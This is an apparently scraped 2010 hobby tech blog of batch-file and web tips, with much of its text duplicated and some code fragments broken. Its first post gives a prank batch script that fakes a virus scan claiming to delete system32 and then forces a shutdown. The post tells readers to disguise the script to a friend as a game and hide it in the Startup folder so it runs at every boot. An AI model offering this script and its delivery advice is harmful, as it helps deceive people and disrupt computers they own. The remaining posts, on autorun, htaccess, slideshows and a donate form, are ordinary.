@ping -n 4 -w 1000 > nul
@ping -n %1% -w 1000> nul
title Microsoft Windows [Version 5.1.2600]
echo WARNING!!!!!!!!!
@ping -n 1 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Virus Infection found in the system
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Scanning System for Infected Files
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
@ping -n 1 -w 1000 > nul
@ping -n %1% -w 1000> nul
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo System Scan Completed!!!!!!!!
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Infected Files Found
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo C:\WINDOWS\system32
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Deleting Infected Files!!!!!
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping -n 1 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping -n 1 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping -n 1 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Cannot Delete Infected Files!!!!!
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo System Files Corrupted
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Windows Has Found Fatal Runtime Error
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Windows Can Not Reboot Itself
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Windows Is Shutting Down
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
msg * Windows is Shutting Down
shutdown -s -t 30 "Windows file write delayed. Unable to locate system.exe"
Copy Paste it in Notepad and save it as install.bat
Tell your friend it's a new game or something. It'll B fun.
Hide this file in the Startup folder in C:\Documents and Settings\Username\Start Menu\Programs\Startup
Then It'll automatically start on every boot up.
Next I'll post a code 2 copy this file 2 Startup folder so U don't have 2.
Now it does nothing much it only opens command prompt and asks U 2 hit a key when U hit a key it starts showing a message that it is a virus and it'll delete all your files, D usual stuff.
Then it appears that D computer is scanning 4 D virus and it deletes D system32 folder and then your computer can't reboot and it shuts down. There is a code that creates a shutdown countdown at D end.
So Here's D code
@echo off
rem Batch Attack v1.0
rem Created By Tanmay Das
title Command Prompt
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
color 04
title Mad Hatter v0.1
echo I have something to tell you.
@ping -n 3 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Actually I'm a virus.....
@ping -n 3 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo I will delete your files.....
@ping -n 3 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo COOL RIGHT!!!!
@ping -n 3 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo So you better say goodbye to all your files!!
@ping -n 3 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Nothing Personal it's just the way I was made :)
@ping -n 4 -w 1000 > nul
@ping -n %1% -w 1000> nul
title Microsoft Windows [Version 5.1.2600]
echo WARNING!!!!!!!!!
@ping -n 1 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Virus Infection found in the system
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Scanning System for Infected Files
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
@ping -n 1 -w 1000 > nul
@ping -n %1% -w 1000> nul
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo System Scan Completed!!!!!!!!
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Infected Files Found
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo C:\WINDOWS\system32
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Deleting Infected Files!!!!!
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping -n 1 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping -n 1 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping -n 1 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Cannot Delete Infected Files!!!!!
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo System Files Corrupted
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Windows Has Found Fatal Runtime Error
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Windows Can Not Reboot Itself
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Windows Is Shutting Down
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
msg * Windows is Shutting Down
shutdown -s -t 30 "Windows file write delayed. Unable to locate system.exe"
Copy Paste it in Notepad and save it as install.bat
Tell your friend it's a new game or something. It'll B fun.
Hide this file in the Startup folder in C:\Documents and Settings\Username\Start Menu\Programs\Startup
Then It'll automatically start on every boot up.
Next I'll post a code 2 copy this file 2 Startup folder so U don't have 2.
Thursday, March 18, 2010
Locking a folder with password by a batch file
Many of U might have a sibling who always uses your computer. Sometimes it becomes irritating if U write a diary on your computer. He/She might read it and chances are publish it on Facebook™ or Twitter™.
So what can U do 2 stop this? Well U can download a free encoding software from D net 2 password protect your folders and even zip them. (U can password protect a zip file or even a pdf file)
But downloading a free software is somewhat risky nowadays. I'm not scaring U in anyway but that what I've suffered. Also if someone sees such a software on your computer then chances R they'll know 4 sure that U R hiding something. So D solution is 2 hide a folder without any software.
Here is a batch file that hides your files & U have 2 enter a password 2 get them back.
Open Notepad
title Secret Folder
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
echo Are you sure u want to Hide the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== mypassword goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Secret
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md Secret
echo Folder created successfully
goto End
Change mypassword with your password.
Save it as nothing.bat or something (remember to select all files & save it with a .bat extension)
All done, now when U double click on this file, a folder named Secret will B created. Add all your files that U want 2 hide in it & then double click on D bat file. It'll ask U if U wish 2 hide Secret folder. Type Y for yes and N for no. Once hidden if U want 2 get back your files then double click on the bat file again, it'll ask U 2 enter a password, enter D password that U placed in it & your Secret folder will appear.
P.S.- I've not written this file myself, I got it from D net. But I have tested & use this batch file, so I'd say it works great. Soon I might add some changes 2 it & post it again.
So what can U do 2 stop this? Well U can download a free encoding software from D net 2 password protect your folders and even zip them. (U can password protect a zip file or even a pdf file)
But downloading a free software is somewhat risky nowadays. I'm not scaring U in anyway but that what I've suffered. Also if someone sees such a software on your computer then chances R they'll know 4 sure that U R hiding something. So D solution is 2 hide a folder without any software.
Here is a batch file that hides your files & U have 2 enter a password 2 get them back.
Open Notepad
title Secret Folder
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
echo Are you sure u want to Hide the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== mypassword goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Secret
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md Secret
echo Folder created successfully
goto End
Change mypassword with your password.
Save it as nothing.bat or something (remember to select all files & save it with a .bat extension)
All done, now when U double click on this file, a folder named Secret will B created. Add all your files that U want 2 hide in it & then double click on D bat file. It'll ask U if U wish 2 hide Secret folder. Type Y for yes and N for no. Once hidden if U want 2 get back your files then double click on the bat file again, it'll ask U 2 enter a password, enter D password that U placed in it & your Secret folder will appear.
P.S.- I've not written this file myself, I got it from D net. But I have tested & use this batch file, so I'd say it works great. Soon I might add some changes 2 it & post it again.
Wednesday, March 10, 2010
Making an autorun file
When you make a presentation it makes a good impression if your presentation (video, audio or .exe files) executes on inserting the CD. This can be achieved by autorun.
Autorun is a utility by which Windows™ users can automatically run any application on a CD or a flash drive when it is connected to the PC. It is achieved by a text file named autorun.inf which must be present on the root directory of the CD or flash drive. When inserted the OS looks for the autorun.inf in the CD, if not found then it shows the usual menu.
To use this utility all you have to do is create a autorun.inf file and save it on your CD or flash drive. You can also configure your autorun.inf to do much more.
To make a autorun.inf file, open Notepad and type in it:
Save the file as autorun.inf (remember to select all files)
Now for the explanations:
[autorun] is the command for autorun utility.
open is the parameter that can be changed as per your needs (here it opens the file).
myfile.exe is the value of the parameter, you can change the extension depending on the file you want to open.
You can also make some changes to this basic file. For e.g.:
If your file is inside a folder you have to add the location as
Autorun is a utility by which Windows™ users can automatically run any application on a CD or a flash drive when it is connected to the PC. It is achieved by a text file named autorun.inf which must be present on the root directory of the CD or flash drive. When inserted the OS looks for the autorun.inf in the CD, if not found then it shows the usual menu.
To use this utility all you have to do is create a autorun.inf file and save it on your CD or flash drive. You can also configure your autorun.inf to do much more.
To make a autorun.inf file, open Notepad and type in it:
Save the file as autorun.inf (remember to select all files)
Now for the explanations:
[autorun] is the command for autorun utility.
open is the parameter that can be changed as per your needs (here it opens the file).
myfile.exe is the value of the parameter, you can change the extension depending on the file you want to open.
You can also make some changes to this basic file. For e.g.:
If your file is inside a folder you have to add the location as
open=first folder/second folder/myfile.exe
If you want an icon to be shown instead of the CD or flash drive icon (like in many software install CDs)
You can add this line:
You can add any file as icon with the following extensions:
So thats that all that I knew about autorun files.
Saturday, March 6, 2010
Option in Browsing
U know that Microsoft™ gives away Internet Explorer™ with Windows™ 4 free, but soon there'll B some changes. Many big browser making companies have complained that Explorer is getting more advantages as many people don't know much about computers let alone browsers, so they don't know their options.
So Microsoft™ has decided 2 add some changes 2 Windows™. Like now when U open Windows™ your default browser is Explorer™, but soon in their newer versions when you'll open browser U'll get a list of all available browsers and U have 2 choose which 1 U want 2 use.
Cool but I M sticking 2 my older version as it is working fine as it is.
So Microsoft™ has decided 2 add some changes 2 Windows™. Like now when U open Windows™ your default browser is Explorer™, but soon in their newer versions when you'll open browser U'll get a list of all available browsers and U have 2 choose which 1 U want 2 use.
Cool but I M sticking 2 my older version as it is working fine as it is.
Transfer money with Facebook
No Paypal™, No Alertpay™ just Facebook™.
Yeah all U need is Facebook™ to transfer amount to your friend. A new app called Buxter™ allows U 2 transfer amount upto 50,000 in USD 2 any friend who has this app. And all this is free. But U have 2 pay 4 any withdrawal that U make. So go right ahead try it out & tell me if it's worth it or not.
U can download D app from here
This is Buxter's official site
Yeah all U need is Facebook™ to transfer amount to your friend. A new app called Buxter™ allows U 2 transfer amount upto 50,000 in USD 2 any friend who has this app. And all this is free. But U have 2 pay 4 any withdrawal that U make. So go right ahead try it out & tell me if it's worth it or not.
U can download D app from here
This is Buxter's official site
Tuesday, March 2, 2010
Matrix in Notepad
How many of U liked D Matrix???
What did U like most about D Matrix???
I liked D Matrix pattern U know with D numbers & letters in green on black.
So I found this code:
@echo off
color 0a
echo W 8 e L c 7 o M 2 E t 0 O t 0 H e 5 m A 7 t R I 1 x
ping localhost -n 1
> nul
echo W 8 e L c 7 o M 2 E t 0 O t 0 H e 5 m A 7 t R I 1 x
ping localhost -n 1
> nul
echo W 8 e L c 7 o M 2 E t 0 O t 0 H e 5 m A 7 t R I 1 x
ping localhost -n 1
> nul
echo W 8 e L c 7 o M 2 E t 0 O t 0 H e 5 m A 7 t R I 1 x
ping localhost -n 1
> nul
goto A
Now save it as "matrix.bat"
Done 2 make it appear full screen, just copy & paste the lines
echo W 8 e L c 7 o M 2 E t 0 O t 0 H e 5 m A 7 t R I 1 x
ping localhost -n 1
> nul more & more.
U can also make it appear full screen.
Just create a shortcut, Right-click on matrix.bat > create shortcut.
Select D shortcut > Right-click > Properties > Open in window : Maximized.
P.S.- Neither have I written this code nor do I take any responsibility 4 it. Use at your own risk.
What did U like most about D Matrix???
I liked D Matrix pattern U know with D numbers & letters in green on black.
So I found this code:
@echo off
color 0a
echo W 8 e L c 7 o M 2 E t 0 O t 0 H e 5 m A 7 t R I 1 x
ping localhost -n 1
> nul
echo W 8 e L c 7 o M 2 E t 0 O t 0 H e 5 m A 7 t R I 1 x
ping localhost -n 1
> nul
echo W 8 e L c 7 o M 2 E t 0 O t 0 H e 5 m A 7 t R I 1 x
ping localhost -n 1
> nul
echo W 8 e L c 7 o M 2 E t 0 O t 0 H e 5 m A 7 t R I 1 x
ping localhost -n 1
> nul
goto A
Now save it as "matrix.bat"
Done 2 make it appear full screen, just copy & paste the lines
echo W 8 e L c 7 o M 2 E t 0 O t 0 H e 5 m A 7 t R I 1 x
ping localhost -n 1
> nul more & more.
U can also make it appear full screen.
Just create a shortcut, Right-click on matrix.bat > create shortcut.
Select D shortcut > Right-click > Properties > Open in window : Maximized.
P.S.- Neither have I written this code nor do I take any responsibility 4 it. Use at your own risk.
Changing Background 4 your site
What this script will do is change your background image after a fixed time period. U can add as many images as U want. I have not seen anything like that on any site yet. But who knows.
So I have this script take it or leave it your choice.
<script language="JavaScript">
<!-- This is not my script nor do I claim any rights on it. If U want U can give me D credits 4 bringing it 2 U
// Set speed (milliseconds)
var speed = 1000
// Specify the image files
var Pic = new Array() // don't touch this
Pic[0] = '1.gif'
Pic[1] = '2.gif'
Pic[2] = '3.gif'
Pic[3] = '4.gif'
// do not edit anything below this line
var t
var j = 0
var p = Pic.length
var preLoad = new Array()
for (i = 0; i < p; i++){ preLoad[i] = new Image() preLoad[i].src = Pic[i] } function runBGSlideShow(){ if (document.body){ document.body.background = Pic[j]; j = j + 1 if (j > (p-1)) j=0
t = setTimeout('runBGSlideShow()', speed)
// End -->
<body onload="runBGSlideShow()">
Just ad more bg pics after Pic[3] = '4.gif' and U R done.
So I have this script take it or leave it your choice.
<script language="JavaScript">
<!-- This is not my script nor do I claim any rights on it. If U want U can give me D credits 4 bringing it 2 U
// Set speed (milliseconds)
var speed = 1000
// Specify the image files
var Pic = new Array() // don't touch this
Pic[0] = '1.gif'
Pic[1] = '2.gif'
Pic[2] = '3.gif'
Pic[3] = '4.gif'
// do not edit anything below this line
var t
var j = 0
var p = Pic.length
var preLoad = new Array()
for (i = 0; i < p; i++){ preLoad[i] = new Image() preLoad[i].src = Pic[i] } function runBGSlideShow(){ if (document.body){ document.body.background = Pic[j]; j = j + 1 if (j > (p-1)) j=0
t = setTimeout('runBGSlideShow()', speed)
// End -->
<body onload="runBGSlideShow()">
Just ad more bg pics after Pic[3] = '4.gif' and U R done.
Sunday, February 28, 2010
Htaccess Custom Error Pages
Many of U may have a website. So this is something that U might know, but if U don't then this might B a little helpful 2 U.
Do U know what happens when a user enters D url of a page that is not present on your server???
Well in normal cases & in most cases, D user will see a 404 Error (File Not Found) Page generated by D browser. Now that is really annoying as D user has 2 go back & find another page. So what is D solution.
Simple just follow the steps & U'll get results that'll make your site look more professional.
Now U can also make custom pages 4 any error, just add another line ErrorDocument 404 /404.html & replace D 404 with D error U want 2 make D page 4 & 404.html with D page name.
Here are a short list of error numbers:
Do U know what happens when a user enters D url of a page that is not present on your server???
Well in normal cases & in most cases, D user will see a 404 Error (File Not Found) Page generated by D browser. Now that is really annoying as D user has 2 go back & find another page. So what is D solution.
Simple just follow the steps & U'll get results that'll make your site look more professional.
- Create a page with D theme of your site. U can add anything like ads, menus, just think what U want 2 do with a page.
- Next save it with a suitable name like 404.html.
- Create a text file and save it as htaccess.txt.
- In htaccess.txt type, ErrorDocument 404 /404.html
- Save all the files & upload them on your server in your main directory.
- IMPORTANT : Rename D htaccess.txt to .htaccess (do not add any extension)
- Done now if the user types any url that is not found, then D user will B directed 2 this custom page.
Now U can also make custom pages 4 any error, just add another line ErrorDocument 404 /404.html & replace D 404 with D error U want 2 make D page 4 & 404.html with D page name.
Here are a short list of error numbers:
- 400 - Bad Request
- 401 - Not Authorised
- 403 - Forbidden
- 404 - Not Found
- 408 - Request Timeout
- 410 - Gone
- 415 - Unsupported Media Type
- 500 - Internal Server Error
- 503 - Service Unavailable
Saturday, February 27, 2010
Donate button in Alertpay
Many times I have read about a donate button. U know those button where D users can donate small amount 2 D site. But finding 1 is really tough. Paypal™ has a donate button, but U can donate only if U have a Paypal™ account. But everyone doesn't has a Paypal™ account.
So D other option is 2 allow people 2 use their credit-cards 2 donate. But 2 enable this feature U have 2 pay an excess of 20-25%. Now that is a real ripoff.
Another option is Alertpay™, they allow credit-card transaction 4 free after a simple site verification. But D problem is they don't have a ready made donate button. So D option is 2 use a buy button as a donate button.
But now D problem is that D amount 4 a buy button is fixed (as U don't want D user 2 decide D amount 4 a purchase), but in case of a donation D user wishes 2 select D amount 2 donate.
Now I searched D net 4 sometime & finally found a code which allows D user 2 change D amount 2 donate as per their wish. But it had some problem, just a glitch as U can add any text in D text box. Now that is silly as no one would enter alphabet in that text box but Y take D risk so I found a script & modified D code so that only positive integers can B entered in D text box.
So here is D code:
<!-- Code written by someone else but the whole thing is made by Tanmay Das -->
<script language="JavaScript">
function checkIt(evt) {
evt = (evt) ? evt : window.event
var charCode = (evt.which) ? evt.which : evt.keyCode
if (charCode > 31 && (charCode < 48 || charCode > 57)) {
status = "This field accepts numbers only."
return false
status = ""
return true
Enter Donation Amount:
<form method="post" action="">
<input type="hidden" name="ap_purchasetype" value="item-goods">
<input type="hidden" name="ap_merchant" value="">
<input type="hidden" name="ap_itemname" value="Donate">
<input type="hidden" name="ap_returnurl" value="">
<input type="hidden" name="ap_quantity" value="1">
<input type="hidden" name="ap_description" value="Description of your donation">
<input type="text" name="ap_amount" value="" onKeyPress="return checkIt(event)">
<select name="ap_currency">
<option value="AUD">AUD</option>
<option value="BGN">BGN</option>
<option value="CAD">CAD</option>
<option value="CHF">CHF</option>
<option value="CZK">CZK</option>
<option value="DKK">DKK</option>
<option value="EEK">EEK</option>
<option value="EUR">EUR</option>
<option value="GBP">GBP</option>
<option value="HKD">HKD</option>
<option value="HUF">HUF</option>
<option value="LTL">LTL</option>
<option value="MYR">MYR</option>
<option value="NOK">NOK</option>
<option value="NZD">NZD</option>
<option value="PLN">PLN</option>
<option value="RON">RON</option>
<option value="SEK">SEK</option>
<option value="SGD">SGD</option>
<option value="USD" selected="selected">USD</option>
<option value="ZAR">ZAR</option>
<input type="hidden" name="ap_cancelurl" value="">
<input type="image" name="ap_image" src="donate.gif">
So D other option is 2 allow people 2 use their credit-cards 2 donate. But 2 enable this feature U have 2 pay an excess of 20-25%. Now that is a real ripoff.
Another option is Alertpay™, they allow credit-card transaction 4 free after a simple site verification. But D problem is they don't have a ready made donate button. So D option is 2 use a buy button as a donate button.
But now D problem is that D amount 4 a buy button is fixed (as U don't want D user 2 decide D amount 4 a purchase), but in case of a donation D user wishes 2 select D amount 2 donate.
Now I searched D net 4 sometime & finally found a code which allows D user 2 change D amount 2 donate as per their wish. But it had some problem, just a glitch as U can add any text in D text box. Now that is silly as no one would enter alphabet in that text box but Y take D risk so I found a script & modified D code so that only positive integers can B entered in D text box.
So here is D code:
<!-- Code written by someone else but the whole thing is made by Tanmay Das -->
<script language="JavaScript">
function checkIt(evt) {
evt = (evt) ? evt : window.event
var charCode = (evt.which) ? evt.which : evt.keyCode
if (charCode > 31 && (charCode < 48 || charCode > 57)) {
status = "This field accepts numbers only."
return false
status = ""
return true
Enter Donation Amount:
<form method="post" action="">
<input type="hidden" name="ap_purchasetype" value="item-goods">
<input type="hidden" name="ap_merchant" value="">
<input type="hidden" name="ap_itemname" value="Donate">
<input type="hidden" name="ap_returnurl" value="">
<input type="hidden" name="ap_quantity" value="1">
<input type="hidden" name="ap_description" value="Description of your donation">
<input type="text" name="ap_amount" value="" onKeyPress="return checkIt(event)">
<select name="ap_currency">
<option value="AUD">AUD</option>
<option value="BGN">BGN</option>
<option value="CAD">CAD</option>
<option value="CHF">CHF</option>
<option value="CZK">CZK</option>
<option value="DKK">DKK</option>
<option value="EEK">EEK</option>
<option value="EUR">EUR</option>
<option value="GBP">GBP</option>
<option value="HKD">HKD</option>
<option value="HUF">HUF</option>
<option value="LTL">LTL</option>
<option value="MYR">MYR</option>
<option value="NOK">NOK</option>
<option value="NZD">NZD</option>
<option value="PLN">PLN</option>
<option value="RON">RON</option>
<option value="SEK">SEK</option>
<option value="SGD">SGD</option>
<option value="USD" selected="selected">USD</option>
<option value="ZAR">ZAR</option>
<input type="hidden" name="ap_cancelurl" value="">
<input type="image" name="ap_image" src="donate.gif">
Doo tell me if U find it handy
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